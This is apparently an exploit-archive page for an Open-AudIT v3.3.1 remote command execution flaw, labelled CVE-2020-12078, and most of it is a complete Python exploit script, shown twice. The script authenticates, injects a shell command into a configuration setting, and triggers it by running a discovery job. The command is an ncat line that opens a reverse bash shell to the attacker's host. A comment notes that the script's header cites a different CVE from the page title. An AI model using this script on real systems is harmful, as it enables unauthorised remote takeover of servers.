CVE-2020-12078_Open-AudIT_v3.3.1_遠程命令執行漏洞

# CVE-2020-12078 Open-AudIT v3.3.1 遠程命令執行漏洞

==漏洞影響==

Open-AudIT v3.3.1

==EXP==

#!/usr/bin/python3

# Exploit Title: Open-AudIT Professional v3.3.1 Remote Code Execution
# Date: 22/04/2020
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813 (note: the page title and heading attribute this exploit to CVE-2020-12078)
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24

import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote

# Suppress bs4 UserWarnings so the status lines printed below stay readable.
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')


# Positional arguments: target base URL, credentials, and the listener address.
if len(sys.argv) != 6:
   print("[~] Usage : ./openaudit-exploit.py url username password ip port")
   exit()

url, username, password, ip, port = sys.argv[1:6]

# A single session so the cookie obtained by login() is reused by every later request.
request = requests.session()

def inject_payload():
   """Write the command string into Open-AudIT configuration item 90 via PATCH.

   Uses the module-level ``request`` session (expected to be authenticated by
   ``login()`` first), plus ``url``, ``ip`` and ``port``.  The response of the
   PATCH is discarded, so the success message below is printed unconditionally
   even when the server rejected the write.
   """
   configuration_path = url+"/en/omk/open-audit/configuration/90"
   # The body is a pre-serialised "data=<json>" form string, not a JSON body.
   # The "value" field is a ";"-delimited shell fragment with ${IFS} standing
   # in for spaces; ip and port are substituted with %s.
   # Detection note: a PATCH to /configuration/<id> whose "value" contains
   # shell metacharacters (";", "${IFS}") is the observable indicator here.
   data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
   request.patch(configuration_path, data)
   print("[+] Payload injected in settings")


def start_discovery():
   """Create a new subnet discovery and then request its ``/execute`` URL.

   Runs after ``inject_payload()`` on the same module-level ``request``
   session.  Presumably executing a discovery is what makes the server act on
   the configuration value written earlier; that server-side behaviour is not
   visible in this file -- TODO confirm against the vendor advisory.

   No return value.  Raises ``KeyError`` if the create response carries no
   ``Location`` header and ``IndexError`` if the create form has fewer than
   six ``<input>`` elements.
   """
   discovery_path = url+"/en/omk/open-audit/discoveries/create"
   post_discovery_path = url+"/en/omk/open-audit/discoveries"
   # Random 10-letter name so repeated runs do not collide on the discovery name.
   scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
   # Fetch the create form first: the token needed by the POST is read from it.
   req = request.get(discovery_path)

   response = req.text
   soup = BeautifulSoup(response, "html5lib")
   # Positional lookup: assumes the sixth <input> on the page is the access
   # token field (its value is posted as data[access_token] below).  Any change
   # in form layout silently picks up the wrong field.
   token = soup.findAll('input')[5].get("value")
   buttons = soup.findAll("button")  # unused
   headers = {"Referer" : discovery_path}
   request_data = {
   "data[attributes][name]":scan_name,
   # Hard-coded subnet; it is not derived from the target URL.
   "data[attributes][other][subnet]":"10.10.10.1/24",
   "data[attributes][other][ad_server]":"",
   "data[attributes][other][ad_domain]":"",
   "submit":"",
   "data[type]":"discoveries",
   "data[access_token]":token,
   "data[attributes][complete]":"y",
   "data[attributes][org_id]":"1",
   "data[attributes][type]":"subnet",
   "data[attributes][devices_assigned_to_org]":"",
   "data[attributes][devices_assigned_to_location]":"",
   "data[attributes][other][nmap][discovery_scan_option_id]":"1",
   "data[attributes][other][nmap][ping]":"y",
   "data[attributes][other][nmap][service_version]":"n",
   "data[attributes][other][nmap][open|filtered]":"n",
   "data[attributes][other][nmap][filtered]":"n",
   "data[attributes][other][nmap][timing]":"4",
   "data[attributes][other][nmap][nmap_tcp_ports]":"0",
   "data[attributes][other][nmap][nmap_udp_ports]":"0",
   "data[attributes][other][nmap][tcp_ports]":"22,135,62078",
   "data[attributes][other][nmap][udp_ports]":"161",
   "data[attributes][other][nmap][timeout]":"",
   "data[attributes][other][nmap][exclude_tcp_ports]":"",
   "data[attributes][other][nmap][exclude_udp_ports]":"",
   "data[attributes][other][nmap][exclude_ip]":"",
   "data[attributes][other][nmap][ssh_ports]":"22",
   "data[attributes][other][match][match_dbus]":"",
   "data[attributes][other][match][match_fqdn]":"",
   "data[attributes][other][match][match_dns_fqdn]":"",
   "data[attributes][other][match][match_dns_hostname]":"",
   "data[attributes][other][match][match_hostname]":"",
   "data[attributes][other][match][match_hostname_dbus]":"",
   "data[attributes][other][match][match_hostname_serial]":"",
   "data[attributes][other][match][match_hostname_uuid]":"",
   "data[attributes][other][match][match_ip]":"",
   "data[attributes][other][match][match_ip_no_data]":"",
   "data[attributes][other][match][match_mac]":"",
   "data[attributes][other][match][match_mac_vmware]":"",
   "data[attributes][other][match][match_serial]":"",
   "data[attributes][other][match][match_serial_type]":"",
   "data[attributes][other][match][match_sysname]":"",
   "data[attributes][other][match][match_sysname_serial]":"",
   "data[attributes][other][match][match_uuid]":""

   }
   print("[+] Creating discovery ..")
   # Redirects are disabled so the Location header of the redirect response
   # (the path of the newly created discovery) can be read instead of followed.
   req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
   disocvery_url = url + req.headers['Location'] + "/execute"
   print("[+] Triggering payload ..")
   print("[+] Check your nc ;)")
   # Detection note: the sequence PATCH /configuration/<id> -> POST /discoveries
   # -> GET <new discovery path>/execute from a single session is the trace this
   # technique leaves in the web server logs.
   request.get(disocvery_url)


def login():
   """Authenticate the shared ``request`` session against the Open-AudIT login form.

   Posts the module-level ``username`` and ``password`` to ``url`` and reports
   success purely by the absence of the server's error string in the response
   body; no status code is inspected.

   Returns:
       bool: ``True`` unless the response text contains the authentication
       error message.
   """
   form = {
   "redirect_url": "/en/omk/open-audit",
   "username": username,
   "password": password
   }
   page = request.post(url+"/en/omk/open-audit/login", form).text
   return "There was an error authenticating" not in page

# Script entry: authenticate first; the two steps that follow reuse the session.
if not login():
   print("[-] Cannot login!")
else:
   print("[+] LoggedIn Successfully")
   inject_payload()
   start_discovery()


==漏洞影響==

Open-AudIT v3.3.1

==EXP==

#!/usr/bin/python3

# Exploit Title: Open-AudIT Professional v3.3.1 Remote Code Execution
# Date: 22/04/2020
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813 (note: the page title and heading attribute this exploit to CVE-2020-12078)
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24

import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote

# Suppress bs4 UserWarnings so the status lines printed below stay readable.
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')


# Positional arguments: target base URL, credentials, and the listener address.
if len(sys.argv) != 6:
   print("[~] Usage : ./openaudit-exploit.py url username password ip port")
   exit()

url, username, password, ip, port = sys.argv[1:6]

# A single session so the cookie obtained by login() is reused by every later request.
request = requests.session()

def inject_payload():
   """Write the command string into Open-AudIT configuration item 90 via PATCH.

   Uses the module-level ``request`` session (expected to be authenticated by
   ``login()`` first), plus ``url``, ``ip`` and ``port``.  The response of the
   PATCH is discarded, so the success message below is printed unconditionally
   even when the server rejected the write.
   """
   configuration_path = url+"/en/omk/open-audit/configuration/90"
   # The body is a pre-serialised "data=<json>" form string, not a JSON body.
   # The "value" field is a ";"-delimited shell fragment with ${IFS} standing
   # in for spaces; ip and port are substituted with %s.
   # Detection note: a PATCH to /configuration/<id> whose "value" contains
   # shell metacharacters (";", "${IFS}") is the observable indicator here.
   data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
   request.patch(configuration_path, data)
   print("[+] Payload injected in settings")


def start_discovery():
   """Create a new subnet discovery and then request its ``/execute`` URL.

   Runs after ``inject_payload()`` on the same module-level ``request``
   session.  Presumably executing a discovery is what makes the server act on
   the configuration value written earlier; that server-side behaviour is not
   visible in this file -- TODO confirm against the vendor advisory.

   No return value.  Raises ``KeyError`` if the create response carries no
   ``Location`` header and ``IndexError`` if the create form has fewer than
   six ``<input>`` elements.
   """
   discovery_path = url+"/en/omk/open-audit/discoveries/create"
   post_discovery_path = url+"/en/omk/open-audit/discoveries"
   # Random 10-letter name so repeated runs do not collide on the discovery name.
   scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
   # Fetch the create form first: the token needed by the POST is read from it.
   req = request.get(discovery_path)

   response = req.text
   soup = BeautifulSoup(response, "html5lib")
   # Positional lookup: assumes the sixth <input> on the page is the access
   # token field (its value is posted as data[access_token] below).  Any change
   # in form layout silently picks up the wrong field.
   token = soup.findAll('input')[5].get("value")
   buttons = soup.findAll("button")  # unused
   headers = {"Referer" : discovery_path}
   request_data = {
   "data[attributes][name]":scan_name,
   # Hard-coded subnet; it is not derived from the target URL.
   "data[attributes][other][subnet]":"10.10.10.1/24",
   "data[attributes][other][ad_server]":"",
   "data[attributes][other][ad_domain]":"",
   "submit":"",
   "data[type]":"discoveries",
   "data[access_token]":token,
   "data[attributes][complete]":"y",
   "data[attributes][org_id]":"1",
   "data[attributes][type]":"subnet",
   "data[attributes][devices_assigned_to_org]":"",
   "data[attributes][devices_assigned_to_location]":"",
   "data[attributes][other][nmap][discovery_scan_option_id]":"1",
   "data[attributes][other][nmap][ping]":"y",
   "data[attributes][other][nmap][service_version]":"n",
   "data[attributes][other][nmap][open|filtered]":"n",
   "data[attributes][other][nmap][filtered]":"n",
   "data[attributes][other][nmap][timing]":"4",
   "data[attributes][other][nmap][nmap_tcp_ports]":"0",
   "data[attributes][other][nmap][nmap_udp_ports]":"0",
   "data[attributes][other][nmap][tcp_ports]":"22,135,62078",
   "data[attributes][other][nmap][udp_ports]":"161",
   "data[attributes][other][nmap][timeout]":"",
   "data[attributes][other][nmap][exclude_tcp_ports]":"",
   "data[attributes][other][nmap][exclude_udp_ports]":"",
   "data[attributes][other][nmap][exclude_ip]":"",
   "data[attributes][other][nmap][ssh_ports]":"22",
   "data[attributes][other][match][match_dbus]":"",
   "data[attributes][other][match][match_fqdn]":"",
   "data[attributes][other][match][match_dns_fqdn]":"",
   "data[attributes][other][match][match_dns_hostname]":"",
   "data[attributes][other][match][match_hostname]":"",
   "data[attributes][other][match][match_hostname_dbus]":"",
   "data[attributes][other][match][match_hostname_serial]":"",
   "data[attributes][other][match][match_hostname_uuid]":"",
   "data[attributes][other][match][match_ip]":"",
   "data[attributes][other][match][match_ip_no_data]":"",
   "data[attributes][other][match][match_mac]":"",
   "data[attributes][other][match][match_mac_vmware]":"",
   "data[attributes][other][match][match_serial]":"",
   "data[attributes][other][match][match_serial_type]":"",
   "data[attributes][other][match][match_sysname]":"",
   "data[attributes][other][match][match_sysname_serial]":"",
   "data[attributes][other][match][match_uuid]":""

   }
   print("[+] Creating discovery ..")
   # Redirects are disabled so the Location header of the redirect response
   # (the path of the newly created discovery) can be read instead of followed.
   req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
   disocvery_url = url + req.headers['Location'] + "/execute"
   print("[+] Triggering payload ..")
   print("[+] Check your nc ;)")
   # Detection note: the sequence PATCH /configuration/<id> -> POST /discoveries
   # -> GET <new discovery path>/execute from a single session is the trace this
   # technique leaves in the web server logs.
   request.get(disocvery_url)


def login():
   """Authenticate the shared ``request`` session against the Open-AudIT login form.

   Posts the module-level ``username`` and ``password`` to ``url`` and reports
   success purely by the absence of the server's error string in the response
   body; no status code is inspected.

   Returns:
       bool: ``True`` unless the response text contains the authentication
       error message.
   """
   form = {
   "redirect_url": "/en/omk/open-audit",
   "username": username,
   "password": password
   }
   page = request.post(url+"/en/omk/open-audit/login", form).text
   return "There was an error authenticating" not in page

# Script entry: authenticate first; the two steps that follow reuse the session.
if not login():
   print("[-] Cannot login!")
else:
   print("[+] LoggedIn Successfully")
   inject_payload()
   start_discovery()